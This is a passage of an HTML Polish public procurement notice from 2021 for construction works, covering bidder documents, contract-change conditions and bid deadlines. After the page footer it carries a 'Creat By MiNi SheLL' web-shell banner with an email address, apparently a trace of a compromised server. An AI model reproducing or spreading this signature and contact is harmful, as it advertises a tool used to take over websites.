przepisie jest wykonawca składający ofertę. To w jego<br/>interesie leży, aby złożona przez niego oferta była pod względem treści zgodna z warunkami<br/>określonymi w specyfikacji. Pozostałe informacje w tym zakresie zawarte są w rozdziale 13<br/>SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> wykaz oferowanych nawierzchni w sytuacji kiedy wykonawca wcale ich nie przedłoży z ofertą. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składają się: 1) formularz oferty, 2) oświadczenie o niepodleganiu wykluczeniu i<br/>spełnieniu warunków udziału w postępowaniu - (zał. 1 SWZ),3) oświadczenie, o których mowa w<br/>pkt 2 (składa każdy z wykonawców - w przypadku wspólnego ubiegania się o zamówienie przez<br/>wykonawców). Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu - (zał. 1 SWZ),4) oświadczenie, o których mowa w<br/>pkt 2 (podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego<br/>podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca<br/>powołuje się na jego zasoby) – (zał. 2 SWZ),5) w przypadku wykonawców wspólnie<br/>ubiegających się o zamówienie - oświadczenie, z którego wynika, które roboty budowlane,<br/>dostawy lub usługi wykonają poszczególni Wykonawcy - (zał. 3 SWZ),6) zobowiązanie podmiotu<br/>udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że<br/>wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów<br/>(w przypadku wykonawcy, który polega na zdolnościach lub sytuacji innych podmiotów<br/>udostępniających zasoby) – jeżeli dotyczy (zał. 5 SWZ)7) pełnomocnictwo (jeżeli dotyczy),8)<br/>przedmiotowy środek dowodowy jako wykaz sporządzony przez wykonawcę określający<br/>parametry oferowanego produktu - (zał. 7 SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Oświadczenie o niepodleganiu wykluczeniu i spełnieniu warunków udziału w<br/>postępowaniuskłada każdy z wykonawców - w przypadku wspólnego ubiegania się o<br/>zamówienie przezwykonawców.Wykonawcy wspólnie ubiegający sie o zamówienie składają<br/>także: Oświadczenie,z którego wynika, które roboty budowlane, dostawy lub usługi wykonają<br/>poszczególniWykonawcy.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia i<br/>zobowiązani sąustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Poprzez wykonawców wspólnie ubiegających się o zamówienie należy rozumieć konsorcjantów<br/>a także przedsiębiorców prowadzących działalność gospodarczą w formie spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmiany postanowień umowy w zakresie terminu realizacji zamówienia, technologii wykonywania robót, wynagrodzenia na zasadach określonych w ust. 3 - 9.<br/>2.	Pozostałe dopuszczalne zmiany umowy zostały określone w ust. 10 - 30.<br/>3.	Zmiana terminu realizacji może nastąpić w przypadku zaistnienia następujących okoliczności, <br/>o ile będą miały wpływ na zmianę terminu:<br/>1)	działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy, a których strony umowy nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie umowy zgodnie z jej treścią w szczególności: powódź, akty wandalizmu, awarie, katastrofy, zgony lub przedłużająca się pandemia.<br/>2)	konieczności realizacji robót zamiennych lub zaniechania realizacji części robót,<br/>3)	działań mających na celu niezwłoczne usunięcie bezpośredniego zagrożenia bezpieczeństwa ludzi lub mienia,<br/>4)	wytycznych podmiotów zewnętrznych lub opinii branżowych,<br/>5)	zmiany przepisów prawa mających wpływ na zakres lub termin wykonania przedmiotu umowy,<br/>6)	realizacji przez innych wykonawców w drodze odrębnej umowy prac powiązanych z przedmiotem niniejszej umowy wymuszającej konieczność skoordynowania prac i uwzględnienia wzajemnych powiązań,<br/>7)	przedłużających się w stosunku do obowiązujących przepisów, procedur i postępowań administracyjnych, cywilnych, karnych, lub innych w szczególności wydania przez uprawnione organy decyzji o wstrzymaniu robót z powodów, za które wykonawca nie ponosi odpowiedzialności,<br/>8)	zmian korzystnych dla zamawiającego, w szczególności zmierzających do przyspieszenia zakończenia robót, zmniejszających koszty, poprawiających sprawność, jakość, efekt robót, konieczności zmian dokumentacji projektowej, jeżeli będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót lub zwiększenia ich wartości,<br/>9)	napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych, które wpływają na tempo wykonywanych robót,<br/>10)wystąpienia warunków pogodowych niepozwalających na wykonanie zamówienia lub spowalniających wykonanie prac,<br/>11)innych od wyżej przywołanych, niezależnych od wykonawcy pod warunkiem wyrażenia zgody przez zamawiającego.<br/>4.	Jeżeli zajdą okoliczności uzasadniające zmniejszenie ilości wykonywanych na podstawie niniejszej umowy robót lub rezygnacji z określonych ich elementów, w szczególności w wyniku ich realizacji przez podmioty trzecie (np. gestorów lub właścicieli infrastruktury technicznej), wynagrodzenie wykonawcy zostanie zmniejszone zgodnie ze stawkami określonymi w kosztorysie ofertowym, a w przypadku jego braku określonej pozycji w oparciu o uśrednione wskaźniki do kosztorysowania dla województwa łódzkiego wg. wydawnictw branżowych (np. Sekocenbud, Orgbud, Intercenbud).<br/>5.	Za zgodą zamawiającego – w uzgodnieniu z opinią projektanta możliwa jest zmiana technologii, sposobu realizacji robót, stosowanych materiałów, itp. Zmiana taka możliwa jest w przypadku, gdy proponowane rozwiązanie jest równorzędne lub lepsze funkcjonalnie, jakościowo, technicznie od przewidzianego w dokumentacji projektowej w tym także, gdy niesie za sobą zwiększenie kosztów. <br/>6.	Jeżeli w wyniku dokonanych na podstawie ust. 5 zmian dojdzie do obniżenia kosztów realizacji przedmiotu umowy wynagrodzenie wykonawcy zostanie odpowiednio obniżone zgodnie z ust. 4.<br/>Pozostały<br/>dopuszczalny zakres zamian (z uwagi na ograniczoną ilośc znaków w ogłoszeniu) zawarty w<br/>projekcie umowy stanowiącym załacznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-07-30 09:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Na oficjalną Elektroniczną Skrzynkę Podawczą (ESP) Zamawiającego na ePUAP wpływają oferty składane w danym postępowaniu przez Wykonawców. Każda oferta musi być zaszyfrowana. Zaszyfrowane oferty stanowią załącznik do przesłanego na ESP wniosku. Wykonawca posiadający konto na portalu ePUAP ma dostęp do formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do komunikacji.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-07-30 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-08-28</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie nieuregulowane kwestie niniejszego ogłoszenia można odnaleźć w SWZ - na<br/>stronie prowadzonego postępowania tj. na BIP i MINIPORTAL.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com